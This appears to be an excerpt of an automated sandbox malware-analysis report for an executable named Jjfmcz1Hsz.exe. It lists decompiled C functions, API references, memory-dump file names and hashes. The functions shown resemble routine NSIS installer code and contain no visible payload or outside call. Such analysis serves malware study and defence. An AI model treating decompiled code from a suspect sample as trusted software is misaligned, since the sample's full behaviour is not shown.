                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsl1543.tmp
                                                                                                                                                                            • API String ID: 3213498283-180426900
                                                                                                                                                                            • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                                                                                            • Instruction ID: 4ca260c7e1a22d06af12069221c3406c2bee361732d71c1e98a9e22686a99acb
                                                                                                                                                                            • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                                                                                                                            • Instruction Fuzzy Hash: 71F0C253908F942BFB3276641C44B675F88DB55350F04C07BEA80B62C2C6788860CBEA
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00402C02(intOrPtr _a4) {
                                                                                                                                                                            				long _t2;
                                                                                                                                                                            				struct HWND__* _t3;
                                                                                                                                                                            				struct HWND__* _t6;
                                                                                                                                                                            
                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                            					__eflags =  *0x4168c0; // 0x0
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						_t2 = GetTickCount();
                                                                                                                                                                            						__eflags = _t2 -  *0x42370c;
                                                                                                                                                                            						if(_t2 >  *0x42370c) {
                                                                                                                                                                            							_t3 = CreateDialogParamA( *0x423700, 0x6f, 0, E00402B7F, 0);
                                                                                                                                                                            							 *0x4168c0 = _t3;
                                                                                                                                                                            							return ShowWindow(_t3, 5);
                                                                                                                                                                            						}
                                                                                                                                                                            						return _t2;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						return E004060CE(0);
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t6 =  *0x4168c0; // 0x0
                                                                                                                                                                            					if(_t6 != 0) {
                                                                                                                                                                            						_t6 = DestroyWindow(_t6);
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x4168c0 = 0;
                                                                                                                                                                            					return _t6;
                                                                                                                                                                            				}
                                                                                                                                                                            			}






                                                                                                                                                                            0x00402c09
                                                                                                                                                                            0x00402c23
                                                                                                                                                                            0x00402c29
                                                                                                                                                                            0x00402c33
                                                                                                                                                                            0x00402c39
                                                                                                                                                                            0x00402c3f
                                                                                                                                                                            0x00402c50
                                                                                                                                                                            0x00402c59
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402c5e
                                                                                                                                                                            0x00402c65
                                                                                                                                                                            0x00402c2b
                                                                                                                                                                            0x00402c32
                                                                                                                                                                            0x00402c32
                                                                                                                                                                            0x00402c0b
                                                                                                                                                                            0x00402c0b
                                                                                                                                                                            0x00402c12
                                                                                                                                                                            0x00402c15
                                                                                                                                                                            0x00402c15
                                                                                                                                                                            0x00402c1b
                                                                                                                                                                            0x00402c22
                                                                                                                                                                            0x00402c22

                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                            • Opcode ID: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
                                                                                                                                                                            • Instruction ID: 69bd14cd8f1a0d496662edafeb8c2727d8675a530a128bc1770b64b88ff4c26b
                                                                                                                                                                            • Opcode Fuzzy Hash: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
                                                                                                                                                                            • Instruction Fuzzy Hash: 2CF05E7090A220ABD6217F64FE0CDDF7BA4FB41B527018576F144B21E4C379988ACB9D
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E004035E4() {
                                                                                                                                                                            				void* _t2;
                                                                                                                                                                            				void* _t3;
                                                                                                                                                                            				void* _t6;
                                                                                                                                                                            				void* _t8;
                                                                                                                                                                            
                                                                                                                                                                            				_t8 =  *0x41eccc; // 0x706288
                                                                                                                                                                            				_t3 = E004035C9(_t2, 0);
                                                                                                                                                                            				if(_t8 != 0) {
                                                                                                                                                                            					do {
                                                                                                                                                                            						_t6 = _t8;
                                                                                                                                                                            						_t8 =  *_t8;
                                                                                                                                                                            						FreeLibrary( *(_t6 + 8));
                                                                                                                                                                            						_t3 = GlobalFree(_t6);
                                                                                                                                                                            					} while (_t8 != 0);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x41eccc =  *0x41eccc & 0x00000000;
                                                                                                                                                                            				return _t3;
                                                                                                                                                                            			}







                                                                                                                                                                            0x004035e5
                                                                                                                                                                            0x004035ed
                                                                                                                                                                            0x004035f4
                                                                                                                                                                            0x004035f7
                                                                                                                                                                            0x004035f7
                                                                                                                                                                            0x004035f9
                                                                                                                                                                            0x004035fe
                                                                                                                                                                            0x00403605
                                                                                                                                                                            0x0040360b
                                                                                                                                                                            0x0040360f
                                                                                                                                                                            0x00403610
                                                                                                                                                                            0x00403618

                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,76803410,00000000,C:\Users\user\AppData\Local\Temp\,004035BC,004033D6,?), ref: 004035FE
                                                                                                                                                                            • GlobalFree.KERNEL32(00706288), ref: 00403605
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004035E4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 1100898210-3355392842
                                                                                                                                                                            • Opcode ID: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
                                                                                                                                                                            • Instruction ID: f6c6d059f9b75f5cc6a79e0049e3afa1176d7e4558308c53008dbe788c85df41
                                                                                                                                                                            • Opcode Fuzzy Hash: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
                                                                                                                                                                            • Instruction Fuzzy Hash: 3EE0C2338100206BC7211F0AED04B5E77AC6F48B22F054066FC407B3A08B742C418BCC
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E004057B2(char* _a4) {
                                                                                                                                                                            				char* _t3;
                                                                                                                                                                            				char* _t5;
                                                                                                                                                                            
                                                                                                                                                                            				_t5 = _a4;
                                                                                                                                                                            				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                                                                                                            				while( *_t3 != 0x5c) {
                                                                                                                                                                            					_t3 = CharPrevA(_t5, _t3);
                                                                                                                                                                            					if(_t3 > _t5) {
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					break;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *_t3 =  *_t3 & 0x00000000;
                                                                                                                                                                            				return  &(_t3[1]);
                                                                                                                                                                            			}





                                                                                                                                                                            0x004057b3
                                                                                                                                                                            0x004057bd
                                                                                                                                                                            0x004057bf
                                                                                                                                                                            0x004057c6
                                                                                                                                                                            0x004057ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004057ce
                                                                                                                                                                            0x004057d0
                                                                                                                                                                            0x004057d5

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,80000000,00000003), ref: 004057B8
                                                                                                                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,C:\Users\user\Desktop\Jjfmcz1Hsz.exe,80000000,00000003), ref: 004057C6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                                                            • API String ID: 2709904686-3370423016
                                                                                                                                                                            • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                                                                            • Instruction ID: 15550f116ff3ce815c4487a542d9ae56249738f0e4d38f85a76656e2d55d0e49
                                                                                                                                                                            • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                                                                                                                            • Instruction Fuzzy Hash: FAD0C7B2409D705EF31353149C08B9F6A58DF16700F195463E141EB591C6785D415BBD
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E100010E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                            				char* _t17;
                                                                                                                                                                            				char _t19;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				void* _t24;
                                                                                                                                                                            				void* _t27;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            				signed int _t43;
                                                                                                                                                                            				void* _t52;
                                                                                                                                                                            				char* _t53;
                                                                                                                                                                            				char* _t55;
                                                                                                                                                                            				void* _t56;
                                                                                                                                                                            				void* _t58;
                                                                                                                                                                            
                                                                                                                                                                            				 *0x1000405c = _a8;
                                                                                                                                                                            				 *0x10004060 = _a16;
                                                                                                                                                                            				 *0x10004064 = _a12;
                                                                                                                                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556, _t52);
                                                                                                                                                                            				_t43 =  *0x1000405c +  *0x1000405c * 4 << 2;
                                                                                                                                                                            				_t17 = E1000123B();
                                                                                                                                                                            				_a8 = _t17;
                                                                                                                                                                            				_t53 = _t17;
                                                                                                                                                                            				if( *_t17 == 0) {
                                                                                                                                                                            					L16:
                                                                                                                                                                            					return GlobalFree(_a8);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					do {
                                                                                                                                                                            						_t19 =  *_t53;
                                                                                                                                                                            						_t55 = _t53 + 1;
                                                                                                                                                                            						_t58 = _t19 - 0x6c;
                                                                                                                                                                            						if(_t58 > 0) {
                                                                                                                                                                            							_t20 = _t19 - 0x70;
                                                                                                                                                                            							if(_t20 == 0) {
                                                                                                                                                                            								L12:
                                                                                                                                                                            								_t53 = _t55 + 1;
                                                                                                                                                                            								_t24 = E10001266(E100012AD( *_t55 - 0x30));
                                                                                                                                                                            								L13:
                                                                                                                                                                            								GlobalFree(_t24);
                                                                                                                                                                            								goto L14;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t27 = _t20;
                                                                                                                                                                            							if(_t27 == 0) {
                                                                                                                                                                            								L10:
                                                                                                                                                                            								_t53 = _t55 + 1;
                                                                                                                                                                            								_t24 = E100012D1( *_t55 - 0x30, E1000123B());
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							}
                                                                                                                                                                            							L7:
                                                                                                                                                                            							if(_t27 == 1) {
                                                                                                                                                                            								_t31 = GlobalAlloc(0x40, _t43 + 4);
                                                                                                                                                                            								 *_t31 =  *0x10004030;
                                                                                                                                                                            								 *0x10004030 = _t31;
                                                                                                                                                                            								E10001508(_t31 + 4,  *0x10004064, _t43);
                                                                                                                                                                            								_t56 = _t56 + 0xc;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L14;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(_t58 == 0) {
                                                                                                                                                                            							L17:
                                                                                                                                                                            							_t34 =  *0x10004030;
                                                                                                                                                                            							if( *0x10004030 != 0) {
                                                                                                                                                                            								E10001508( *0x10004064, _t34 + 4, _t43);
                                                                                                                                                                            								_t37 =  *0x10004030;
                                                                                                                                                                            								_t56 = _t56 + 0xc;
                                                                                                                                                                            								GlobalFree(_t37);
                                                                                                                                                                            								 *0x10004030 =  *_t37;
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L14;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t39 = _t19 - 0x4c;
                                                                                                                                                                            						if(_t39 == 0) {
                                                                                                                                                                            							goto L17;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t40 = _t39 - 4;
                                                                                                                                                                            						if(_t40 == 0) {
                                                                                                                                                                            							 *_t55 =  *_t55 + 0xa;
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t27 = _t40;
                                                                                                                                                                            						if(_t27 == 0) {
                                                                                                                                                                            							 *_t55 =  *_t55 + 0xa;
                                                                                                                                                                            							goto L10;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L7;
                                                                                                                                                                            						L14:
                                                                                                                                                                            					} while ( *_t53 != 0);
                                                                                                                                                                            					goto L16;
                                                                                                                                                                            				}
                                                                                                                                                                            			}


















                                                                                                                                                                            0x100010e7
                                                                                                                                                                            0x100010ef
                                                                                                                                                                            0x10001103
                                                                                                                                                                            0x1000110b
                                                                                                                                                                            0x10001116
                                                                                                                                                                            0x10001119
                                                                                                                                                                            0x10001121
                                                                                                                                                                            0x10001124
                                                                                                                                                                            0x10001126
                                                                                                                                                                            0x100011c4
                                                                                                                                                                            0x100011d0
                                                                                                                                                                            0x1000112c
                                                                                                                                                                            0x1000112d
                                                                                                                                                                            0x1000112d
                                                                                                                                                                            0x10001130
                                                                                                                                                                            0x10001131
                                                                                                                                                                            0x10001134
                                                                                                                                                                            0x10001203
                                                                                                                                                                            0x10001206
                                                                                                                                                                            0x1000119e
                                                                                                                                                                            0x100011a4
                                                                                                                                                                            0x100011ac
                                                                                                                                                                            0x100011b1
                                                                                                                                                                            0x100011b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100011b4
                                                                                                                                                                            0x10001209
                                                                                                                                                                            0x1000120a
                                                                                                                                                                            0x10001186
                                                                                                                                                                            0x1000118c
                                                                                                                                                                            0x10001194
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001194
                                                                                                                                                                            0x10001152
                                                                                                                                                                            0x10001153
                                                                                                                                                                            0x1000115b
                                                                                                                                                                            0x10001168
                                                                                                                                                                            0x10001170
                                                                                                                                                                            0x10001179
                                                                                                                                                                            0x1000117e
                                                                                                                                                                            0x1000117e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001153
                                                                                                                                                                            0x1000113a
                                                                                                                                                                            0x100011d1
                                                                                                                                                                            0x100011d1
                                                                                                                                                                            0x100011d8
                                                                                                                                                                            0x100011e5
                                                                                                                                                                            0x100011ea
                                                                                                                                                                            0x100011ef
                                                                                                                                                                            0x100011f5
                                                                                                                                                                            0x100011fb
                                                                                                                                                                            0x100011fb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100011d8
                                                                                                                                                                            0x10001140
                                                                                                                                                                            0x10001143
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001149
                                                                                                                                                                            0x1000114c
                                                                                                                                                                            0x1000119b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000119b
                                                                                                                                                                            0x1000114f
                                                                                                                                                                            0x10001150
                                                                                                                                                                            0x10001183
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001183
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100011ba
                                                                                                                                                                            0x100011ba
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100011c3

                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1202605160.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1202572962.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202644162.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202672082.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1780285237-0
                                                                                                                                                                            • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                            • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                            • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E004058D1(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                            				int _v8;
                                                                                                                                                                            				int _t12;
                                                                                                                                                                            				int _t14;
                                                                                                                                                                            				int _t15;
                                                                                                                                                                            				CHAR* _t17;
                                                                                                                                                                            				CHAR* _t27;
                                                                                                                                                                            
                                                                                                                                                                            				_t12 = lstrlenA(_a8);
                                                                                                                                                                            				_t27 = _a4;
                                                                                                                                                                            				_v8 = _t12;
                                                                                                                                                                            				while(lstrlenA(_t27) >= _v8) {
                                                                                                                                                                            					_t14 = _v8;
                                                                                                                                                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                                                                            					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                                                                            					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                            						_t17 = _t27;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t27 = CharNextA(_t27);
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					L5:
                                                                                                                                                                            					return _t17;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t17 = 0;
                                                                                                                                                                            				goto L5;
                                                                                                                                                                            			}









                                                                                                                                                                            0x004058e1
                                                                                                                                                                            0x004058e3
                                                                                                                                                                            0x004058e6
                                                                                                                                                                            0x00405912
                                                                                                                                                                            0x004058eb
                                                                                                                                                                            0x004058f4
                                                                                                                                                                            0x004058f9
                                                                                                                                                                            0x00405904
                                                                                                                                                                            0x00405907
                                                                                                                                                                            0x00405923
                                                                                                                                                                            0x00405909
                                                                                                                                                                            0x00405910
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405910
                                                                                                                                                                            0x0040591c
                                                                                                                                                                            0x00405920
                                                                                                                                                                            0x00405920
                                                                                                                                                                            0x0040591a
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058F9
                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590A
                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                            • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                            • Instruction ID: 481a9c588bbd1c68550dea5b76d7ebd72626077616c8f786d6c844a28ee3c139
                                                                                                                                                                            • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EF0F632504418FFCB02AFA5DC0099EBBA8EF46360B2540B9F800F7310D274EF01ABA9
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:0.2%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:150
                                                                                                                                                                            Total number of Limit Nodes:2
